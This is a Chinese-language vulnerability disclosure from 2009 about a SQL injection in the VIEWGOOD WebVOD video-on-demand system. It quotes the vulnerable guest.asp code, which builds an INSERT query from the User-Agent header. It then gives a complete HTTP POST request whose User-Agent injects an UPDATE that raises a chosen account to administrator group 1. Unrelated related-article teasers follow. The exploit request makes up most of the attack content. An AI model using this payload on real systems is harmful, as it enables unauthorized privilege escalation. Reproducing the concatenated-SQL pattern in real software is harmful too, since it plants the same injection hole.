远古视频点播系统的一个注入漏洞
作者:toby57 来源:Wolves Security Team 发布时间:2009-03-01 12:54:00
标签:漏洞,注入,视频,安全
VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册
相关代码:
szAgent = Request.ServerVariables("HTTP_USER_AGENT")
aTmpInfo = Split(szAgent, " (", -1, 1)
aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)
szBrowser = aAgentInfo(1)
if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then
szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)
else
szOS = aAgentInfo(2)
end if
szClientIP = Request.ServerVariables("REMOTE_ADDR")
szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')"
con.Execute szSQL
HTTP_USER_AGENT我们可以自己构造
POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
Referer: [url]http://you.are.fucked.cn/webmedia/oemui/user/guest.asp[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;
memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E
0
投稿
猜你喜欢
- .htaccess文件是非常有用的,下面一篇介绍:• Part 1 – Introduct
- 我做seo已经有些年头多了,做了一些比较成熟的网站,而且所在的网站公司相对来说也是还说的过去的。我现在在阿邦网做网站优化工作。在工作中,我会
- 自从做卖站以来,遇到的形形色色的人,真是林子大了,什么鸟都有,现在我列出以下几种人,希望卖站新人能从中吸收到一些经验:1)没看清楚卖站的说明
- 中纪委监察部开通举报网站后广受关注,昨日下午网站登陆一直不顺畅,热线电话也一直忙音;到了晚上,相关服务才恢复正常,网民估计是太多人登陆所致。
- 百度公司董事长兼CEO李彦宏(腾讯科技配图)腾讯科技讯(无忌)北京时间8月5日消息,据国外媒体报道,百度首席执行官李彦宏周四在接受彭博电视台
- 如何查看Godady E-gift card的余额呢?有些朋友说它们根本找不到,在哪儿查看Godaddy E-gift card的余额?余额
- 再说说人事(人事=有关人的事情,和业务不太相关)。大多数老板都会觉得人才短缺,常常觉的属下的员工专业度不足,不能完全帮自己分忧解难。大多数员
- 我经常听到人们问:“我的站点有2%的客户转化率,这好吗?”他们应该问的是“为什么其他98%来访我站点的人不会转化成客户呢?”知道这个问题的答
- 12月3日上午消息,28商机在线(28.com)母公司中网在线(OTC:CHNT)已在美国纽约OTCBB市场通过借壳的方式悄然挂牌交易。财报
- 很多热门论坛都会给会员提供FTP资源下载,达到一定等级的会员就可以免费登录这些FTP服务器下载诸多共享资源,如影视、技术资料、常用大型工具软
- 大多数人都有过这样的经历,在浏览网页的时候,经常不知误点哪个按钮,就会莫名其妙打开一个网站,这些网站或是“挂马网站”,只要点击就会中“木马病
- 首先,我门要明白什么是SEO,什么是SEM,什么是网络营销。SEO:搜索引擎最佳化(Search Engine Optimization),
- seo优化中最不起眼的东西,最难学到的东西,就是网页的链接规则了,seo网上流行一句话:内容为王,外链为皇。其实seo在你达到一定境界,接手
- 在Discuz!7.0中,论坛帮助是站长为会员提供的,方便会员能快捷地找到自己需要的内容。站长可以根据站点情况,随意添加帮助信息。Discu
- 基于网络的电子邮件是一种基于Internet的电子邮件系统,它可以让你从一个Web浏览器来发送、接收电子邮件讯息。只要有Internet连接
- 北京时间3月3日消息 据国外媒体报道,雅虎CEO卡罗尔·巴茨周二在庆祝雅虎成立15周年时表示,公司要实现复兴需要多年时间。她希望投资者记住,
- Apache是运行在Linux操作系统上的头号Web服务器。很多小地方都可以用来调整Apache的性能,并降低它对系统资源的影响。其中一个就
- nt4.0下,如果将文件拷贝到别处,则文件的acl欣喜就丢失了,必须借助resource kit里面的scopy.exe程序,而WIN200
- IIS(Internet Information Server)作为当今流行的之一,提供了强大的Internet和Intranet服务功能,
- Dedecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在